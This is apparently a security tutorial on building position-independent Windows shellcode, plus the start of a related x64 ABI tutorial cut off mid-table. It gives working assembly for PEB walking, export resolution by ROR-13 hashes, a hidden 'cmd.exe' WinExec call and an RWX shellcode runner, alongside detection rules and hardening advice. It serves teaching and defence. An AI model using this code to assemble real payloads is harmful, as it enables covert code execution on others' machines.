Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.

1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).

2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS points the FS (x86) or GS (x64) segment base at it, so user-mode code can read any TEB field, including the PEB pointer, in a single instruction:

Architecture	Instruction	Result
x86	`MOV EAX, FS:[0x30]`	`EAX` ← `TEB.ProcessEnvironmentBlock` (PEB)
x64	`MOV RAX, GS:[0x60]`	`RAX` ← `TEB.ProcessEnvironmentBlock` (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

Struct	Field	x86 offset	x64 offset
`_TEB`	`ProcessEnvironmentBlock`	`+0x030`	`+0x060`
`_PEB`	`Ldr`	`+0x00C`	`+0x018`
`_PEB_LDR_DATA`	`InLoadOrderModuleList`	`+0x00C`	`+0x010`
`_PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x014`	`+0x020`
`_PEB_LDR_DATA`	`InInitializationOrderModuleList`	`+0x01C`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`DllBase`	`+0x018`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`BaseDllName`	`+0x02C`	`+0x058`

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
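A Flink pointer lands on the LIST_ENTRY it belongs to, not on the start of the record, so the offset used to read DllBase depends on which list is being walked. The following is a minimal sketch of that arithmetic, assuming the Windows 10/11 layout above (three LIST_ENTRY fields of two pointers each, followed by DllBase). The function and dictionary names are illustrative only.

```python
# Sketch: derive the offset of DllBase relative to each list's LIST_ENTRY.
# Assumes the layout shown above: three LIST_ENTRY fields (two pointers each)
# followed by DllBase. All names here are illustrative, not a real API.
POINTER_SIZE = {"x86": 4, "x64": 8}
LINK_INDEX = {
    "InLoadOrderLinks": 0,
    "InMemoryOrderLinks": 1,
    "InInitializationOrderLinks": 2,
}

def entry_offset(arch, field):
    """Offset of a field from the start of _LDR_DATA_TABLE_ENTRY."""
    ptr = POINTER_SIZE[arch]
    if field == "DllBase":
        return 3 * 2 * ptr              # after three LIST_ENTRY structures
    return LINK_INDEX[field] * 2 * ptr  # each LIST_ENTRY is two pointers

def link_relative_offset(arch, links, field="DllBase"):
    """Offset of `field` measured from the LIST_ENTRY that a Flink points at."""
    return entry_offset(arch, field) - entry_offset(arch, links)

if __name__ == "__main__":
    for arch in POINTER_SIZE:
        for links in LINK_INDEX:
            off = link_relative_offset(arch, links)
            print(f"{arch} via {links}: DllBase at +{off:#x}")
```

For the InMemoryOrder walk this gives +0x20 on x64 and +0x10 on x86, while the entry-relative DllBase offsets stay at +0x30 and +0x18.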

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field — Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

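On current Windows builds the loader populates InMemoryOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList omits the executable and, since Windows 7, places KERNELBASE.dll ahead of kernel32.dll, so the same shortcut fails on that list.) A common shortcut is to take the third entry’s DllBase without ever comparing a name: fewer bytes, no strings, no signatures.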

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.

5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

AddressOfNames and AddressOfNameOrdinals are parallel: index i in one matches index i in the other. The 16-bit value o read from AddressOfNameOrdinals[i] then indexes AddressOfFunctions[o], which is not parallel to the other two. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].
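The two-step indirection is easier to see on plain data. The sketch below models the three arrays as Python lists with made-up values; it parses nothing from memory, and the module contents and names (`resolve_export`, `Alpha`, `Gamma`) are hypothetical.

```python
# Sketch of the name -> ordinal index -> function RVA lookup on synthetic data.
# The "module" below is invented purely to illustrate the indirection.

def resolve_export(image_base, names, name_ordinals, functions, wanted):
    """Return the absolute address of `wanted`, or None if it has no name entry."""
    for i, name in enumerate(names):
        if name == wanted:
            ordinal_index = name_ordinals[i]           # 16-bit index, parallel to names
            return image_base + functions[ordinal_index]
    return None

IMAGE_BASE = 0x7FF800000000          # arbitrary example base
FUNCTIONS = [0x1000, 0x2000, 0x3000] # RVAs, indexed by ordinal index
NAMES = ["Alpha", "Gamma"]           # only two of the three functions are named
NAME_ORDINALS = [0, 2]               # NAMES[i] -> FUNCTIONS[NAME_ORDINALS[i]]

if __name__ == "__main__":
    addr = resolve_export(IMAGE_BASE, NAMES, NAME_ORDINALS, FUNCTIONS, "Gamma")
    print(hex(addr))
```

Note that FUNCTIONS[1] has no name entry at all, which is why the name index cannot be used directly against the function table.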

Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime — The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

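// Pre-computed constants for the routine above (recompute to confirm):
// LoadLibraryA   -> 0xEC0E4E8E
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54
// Note: 0x0726774C, often quoted for LoadLibraryA, is the Metasploit block_api
// value, which also folds the module name into the hash.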

Implementing the loop body inline as a handful of instructions (load a byte, test for NUL, ror, add) inside the export-walk loop yields a resolver of a few dozen bytes that is fully position-independent: no strings, no absolute addresses, no relocations.
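For defenders building YARA rules or decoding hash tables found in a sample, it helps to regenerate the constants rather than trust a copied list. The following is a small Python sketch of the same rotate-then-add routine; the helper names are illustrative.

```python
# Sketch: recompute ROR-13 name hashes (rotate right by 13, then add the byte).
# Mirrors the C routine above; the NUL terminator is not hashed.

def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name: bytes) -> int:
    h = 0
    for byte in name:
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h

if __name__ == "__main__":
    for api in (b"LoadLibraryA", b"GetProcAddress", b"ExitProcess", b"VirtualAlloc"):
        print(f"{api.decode():<16} -> 0x{ror13_hash(api):08X}")
```

With this function-name-only variant, `ror13_hash(b"LoadLibraryA")` evaluates to 0xEC0E4E8E. Variants that also hash the module name, or that upper-case the input first, produce different constants for the same API.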

7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: LEA reg, [rel label] is encoded RIP-relative, and direct CALL/JMP use relative displacements (as they already do on x86):

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

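x86 has no RIP-relative data addressing. The classic substitute is the get-EIP trick: CALL the very next instruction, then POP the return address into a register, which gives a known anchor. Note that a CALL with a zero displacement encodes as E8 00 00 00 00, so this exact form is not null-free: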

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.

8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

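; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; extra zero qword above the string (the immediate below already ends in 0x00)
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' little-endian; the 8th (top) byte is 0x00, so it
                                    ; terminates the string, but the imm64 encoding contains a NUL
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0", first argument for WinExec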
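Whether a stack-string immediate carries a NUL depends only on the string length, so it can be checked before any assembly is written. The sketch below packs a string into 8-byte little-endian immediates in push order and flags any that contain a zero byte; `pack_stack_qwords` is a hypothetical helper, not part of any toolchain.

```python
# Sketch: pack a string into qword immediates (push order) and flag NUL bytes.
# Chunks shorter than 8 bytes are zero-padded, which is where NULs come from.

def pack_stack_qwords(text: bytes):
    """Return [(immediate, contains_nul), ...] with the last chunk first."""
    chunks = [text[i:i + 8] for i in range(0, len(text), 8)]
    result = []
    for chunk in reversed(chunks):          # the stack grows down: push the tail first
        padded = chunk.ljust(8, b"\x00")
        result.append((int.from_bytes(padded, "little"), b"\x00" in padded))
    return result

if __name__ == "__main__":
    for text in (b"cmd.exe", b"kernel32.dll"):
        for value, has_nul in pack_stack_qwords(text):
            flag = "contains NUL" if has_nul else "null-free"
            print(f"{text!r}: 0x{value:016X} ({flag})")
```

A 7-character string such as "cmd.exe" always leaves the top byte of its qword at zero, so only strings whose length is a multiple of eight pack into null-free immediates without further transformation.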

Eliminate accidental nulls in opcodes:

Avoid	Use instead	Reason
`mov rax, 0` (`48 C7 C0 00 00 00 00`)	`xor rax, rax`	Removes four NUL bytes
`push 0` (`6A 00`)	`xor reg, reg; push reg`	`6A 00` contains a NUL
Short jumps spanning NUL displacements	Pad with `nop` or reorder code	Avoids NUL in the offset byte
`mov al, 0x00`	`xor al, al`	Same fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.

9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are stored on the stack above the shadow space, so the fifth sits at [RSP + 0x20] at the moment of the CALL. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile registers (RBX, RBP, RDI, RSI, R12–R15) must be saved and restored if you modify them.

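; Calling WinExec("cmd.exe", SW_HIDE) once the API is resolved in RAX
; Assumes RBX was loaded with the string pointer before RSP is modified
    and   rsp, -16                  ; force 16-byte alignment (the original RSP is not restored here)
    sub   rsp, 32                   ; shadow space (home space)

    mov   rcx, rbx                  ; lpCmdLine; a fixed [rsp + N] offset is unreliable once
                                    ; AND has moved RSP by an unknown amount
    xor   edx, edx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; release shadow space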

Misalignment typically manifests as STATUS_ACCESS_VIOLATION on an aligned SSE move (movaps / movdqa) inside kernel32 or ntdll, a tell-tale crash signature when reviewing payloads.

10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

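A quick Python harness checks the extracted blob for embedded nulls and dumps it as a C array. It does not detect relocations, so confirm separately that the object file has none (for example with objdump -r payload.obj):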

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.

11. Common Attacker Techniques

Technique	Description
PEB walking	Resolve `kernel32`/`ntdll` bases via `GS:[0x60]` / `FS:[0x30]` without imports
Export hash resolution	ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack strings	Push immediates to materialise `"cmd.exe"`, `"WinExec"`, etc., on the stack
Reflective loading	PIC stub maps a full DLL into memory and calls its `DllMain` (T1620)
Remote injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` into a target PID
APC queuing	`QueueUserAPC` to deliver shellcode into an alertable thread
Process hollowing	Suspend a benign process, unmap its image, write PIC payload, resume
Module stomping	Overwrite the `.text` of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event ID	Signal
`1`	Process creation (with command line) — anomalous parents (`winword.exe` → `cmd.exe`)
`7`	`ImageLoad` from user-writable paths into system processes
`8`	`CreateRemoteThread` — primary remote-injection signal
`10`	`ProcessAccess` with `GrantedAccess` containing `0x1F0FFF`, `0x1410`, or `PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD`
`17`/`18`	Named pipe creation/connection (common C2 channel)
`25`	`ProcessTampering` (image hollowing)
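GrantedAccess values in Event ID 10 are bit masks, and triage is faster when they are decoded into named rights. The following sketch uses the process access right values from the Windows SDK headers; the function names and the choice of "injection" rights (the write, operation, and create-thread combination named in the table above) are illustrative.

```python
# Sketch: decode a Sysmon EID 10 GrantedAccess mask into process access rights.
# Bit values follow the Windows SDK definitions; helper names are illustrative.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}
INJECTION_RIGHTS = 0x0002 | 0x0008 | 0x0020   # CREATE_THREAD | VM_OPERATION | VM_WRITE

def decode_granted_access(mask):
    """Return the names of all rights set in `mask`, lowest bit first."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)
    if unknown:
        names.append(f"UNKNOWN({unknown:#x})")
    return names

def permits_injection(mask):
    """True when the mask allows allocate + write + remote thread creation."""
    return (mask & INJECTION_RIGHTS) == INJECTION_RIGHTS

if __name__ == "__main__":
    for mask in (0x1410, 0x1F0FFF, 0x002A):
        print(f"{mask:#x}: injection-capable={permits_injection(mask)}")
        print("   ", ", ".join(decode_granted_access(mask)))
```

Decoded this way, 0x1410 turns out to be a read-and-query mask (typical of memory reading rather than writing), whereas 0x002A is the minimal write-and-thread combination.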

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS (pre-Vista value)
      - '0x1410'      # QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ
      - '0x1F1FFF'    # 0x1F0FFF plus QUERY_LIMITED_INFORMATION (0x1000)
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

Mitigation	Effect
ACG (`ProcessDynamicCodePolicy`)	Forbids new executable pages; breaks `VirtualAlloc(PAGE_EXECUTE_READWRITE)`
DEP / NX	Hardware-enforced non-execute on data pages
CFG	Invalidates indirect calls to non-registered targets
HVCI	Hypervisor-enforced kernel code integrity
ASR rules	Block office/script children, untrusted USB execution, etc.
Restrict `SeDebugPrivilege`	Limits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations — Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

Tool	Description	Link
WinDbg	Verify struct offsets (`dt ntdll!_PEB`, `dt ntdll!_LDR_DATA_TABLE_ENTRY`)	microsoft.com
NASM	Assemble x86/x64 PIC payloads in Intel syntax	nasm.us
x64dbg	Dynamic analysis of shellcode in a loader harness	x64dbg.com
Ghidra / IDA	Static disassembly of extracted opcodes	ghidra-sre.org
Process Hacker	Inspect process memory regions and protections	processhacker.sf.io
`pe-sieve`	Hunts injected, hollowed, or stomped modules	github.com/hasherezade/pe-sieve
Volatility 3	`malfind`, `ldrmodules`, `vadinfo` for memory-resident PIC	volatilityfoundation.org
YARA	Signature ROR-13 loops, PEB-walk prologues, hash tables	virustotal.github.io/yara
SilkETW	Subscribe to THREATINT and Kernel-Process providers	github.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Reflective Code Loading	`T1620`	Volatility `malfind` / `ldrmodules`; THREATINT ETW
Process Injection (parent)	`T1055`	Sysmon EID `10` + EID `8`; ETW THREATINT WriteVM/AllocVM
Process Injection: DLL	`T1055.001`	Sysmon EID `7` from unusual paths; `pe-sieve`
Process Injection: APC	`T1055.004`	Kernel-Process ETW thread events on alertable waits
Process Injection: Hollowing	`T1055.012`	Sysmon EID `25` ProcessTampering; `pe-sieve` hollowing scan
Obfuscated Files or Information	`T1027`	YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting Interpreter	`T1059`	EID `4688` / Sysmon EID `1` with command-line auditing

Summary

Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll through a handful of pointer dereferences without any string comparison.
Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.

1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Item	x86	x64
General-purpose registers	8 × 32-bit (`EAX`…`EDI`)	16 × 64-bit (`RAX`…`R15`)
Windows calling convention	`stdcall` / `cdecl` — all args on stack	Unified fast-call — first 4 integer args in registers
TEB segment register	`FS`; PEB at `fs:[0x30]`	`GS`; PEB at `gs:[0x60]`
Address width	32-bit	64-bit (48-bit canonical VA in practice)
`call` pushes	4-byte return address	8-byte return address
RIP-relative addressing	Not available	Available; `lea rax, [rip + offset]` is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.

2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #	Integer Register	Floating-Point Register
1st	`RCX`	`XMM0L`
2nd	`RDX`	`XMM1L`
3rd	`R8`	`XMM2L`
4th	`R9`	`XMM3L`
5th+	Stack (above shadow space)	Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

Class	Registers
Volatile	`RAX`, `RCX`, `RDX`, `R8`, `R9`, `R10`, `R11`, `XMM0`–`XMM5`
Non-volatile	`RBX`, `RBP`, `RDI`, `RSI`, `RSP`, `R12`, `R13`, `R14`, `R15`, `XMM6`–`XMM15`

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

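Note xor r9d, r9d rather than xor r9, r9: writing a 32-bit sub-register zero-extends into the full 64-bit register, so both clear R9. For R8–R15 the two forms are the same length (three bytes) because a REX prefix is needed either way; the byte saving applies to the legacy registers, where xor ecx, ecx is two bytes against three for xor rcx, rcx. Neither form contains a null byte.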
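The size and null-byte trade-offs between these zeroing idioms can be tabulated directly from their encodings. In the sketch below the byte sequences are hand-listed standard encodings, not assembler output, and the dictionary and function names are illustrative.

```python
# Sketch: compare length and NUL count of common register-zeroing encodings.
# Byte sequences are hand-listed standard x64 encodings (an assumption of this
# example, not produced by an assembler).
ENCODINGS = {
    "xor ecx, ecx": bytes.fromhex("31c9"),
    "xor rcx, rcx": bytes.fromhex("4831c9"),
    "xor r9d, r9d": bytes.fromhex("4531c9"),
    "xor r9, r9":   bytes.fromhex("4d31c9"),
    "mov rcx, 0":   bytes.fromhex("48c7c100000000"),
}

def summarize(encodings):
    """Map each mnemonic to (length in bytes, number of NUL bytes)."""
    return {asm: (len(code), code.count(0)) for asm, code in encodings.items()}

if __name__ == "__main__":
    for asm, (length, nuls) in summarize(ENCODINGS).items():
        print(f"{asm:<14} {length} bytes, {nuls} NUL")
```

The REX prefix (0x45 or 0x4D) is what makes both R9 forms three bytes long; only the legacy-register form drops to two.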

Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX. — The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
It is owned by the caller. The callee may overwrite it without saving the previous contents.
The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
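Stack arguments beyond the fourth begin at [RSP + 0x28] as seen by the callee on entry (8 bytes return address + 32 bytes shadow); from the caller’s side, just before the call, the same slot is [RSP + 0x20].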

Layout immediately after `call`, before callee prologue	Offset from `RSP`
Return address (pushed by `call`)	`[RSP + 0x00]`
Shadow slot for `RCX`	`[RSP + 0x08]`
Shadow slot for `RDX`	`[RSP + 0x10]`
Shadow slot for `R8`	`[RSP + 0x18]`
Shadow slot for `R9`	`[RSP + 0x20]`
5th argument (if any)	`[RSP + 0x28]`

